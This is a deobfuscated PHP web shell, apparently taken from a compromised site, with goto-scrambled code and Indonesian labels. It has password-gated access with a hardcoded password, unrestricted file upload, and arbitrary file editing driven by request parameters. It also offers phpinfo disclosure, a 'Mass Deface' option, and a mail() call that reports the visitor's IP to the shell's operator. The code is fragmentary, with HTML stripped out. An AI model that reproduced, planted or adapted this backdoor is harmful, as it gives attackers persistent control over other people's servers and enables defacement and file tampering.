/* Decoded by unphp.net */ goto v9nY1; nWh5O: if (isset($_GET["action"]) && $_GET["action"] === "logout") { session_destroy(); header("Location: " . $_SERVER["REQUEST_URI"]); die; } goto UIda8; RUjvQ: $correct_password = "stellacantik"; goto UarbW; QsQDu: if ($_SERVER["REQUEST_METHOD"] === "GET" && isset($_GET["action"]) && $_GET["action"] === "edit" && isset($_GET["file"])) { $file_path = $_GET["file"]; if (file_exists($file_path)) { editFile($file_path); } else { echo "
"; } } goto xWe4E; XC6kG: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_FILES["uploaded_file"]) && $_POST["action"] === "Upload") { $upload_dir = $directory; $file_name = $_FILES["uploaded_file"]["name"]; $file_tmp = $_FILES["uploaded_file"]["tmp_name"]; $file_error = $_FILES["uploaded_file"]["error"]; if ($file_error === UPLOAD_ERR_OK) { if (move_uploaded_file($file_tmp, "{$upload_dir}/{$file_name}")) { echo " "; } else { echo " "; } } else { echo " "; } } goto PBqHP; P3uWU: echo $directory; goto Dfnxt; cXO_G: displayFiles($directory); goto zXD9v; qlpGi: mail($tujuanmail, "LOGGER", $pesan_alert, "From: [ " . $_SERVER["REMOTE_ADDR"] . " ]"); goto nWh5O; DU9ts: header("Content-Type: text/html; charset=UTF-8"); goto Xy8Ft; q87KK: function editFile($file_path) { if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["file_content"])) { file_put_contents($file_path, $_POST["file_content"]); echo " "; } $content = file_get_contents($file_path); echo ""; } goto oCnF0; RMfag: if (isset($_GET["action"]) && $_GET["action"] === "phpinfo") { phpinfo(); die; } goto uyd7u; oBZq4: ini_set("memory_limit", "64M"); goto DU9ts; Jgq2s: ?> "id="home-button">Home Mass Deface PHP Info LogoutMaaf, terjadi kesalahan saat mengunggah file ke direktori: {$dir}"; } } echo " "; } else { echo " "; } } goto XXTeI; njQnR: if (!isset($_SESSION["authenticated"])) { echo ""; echo "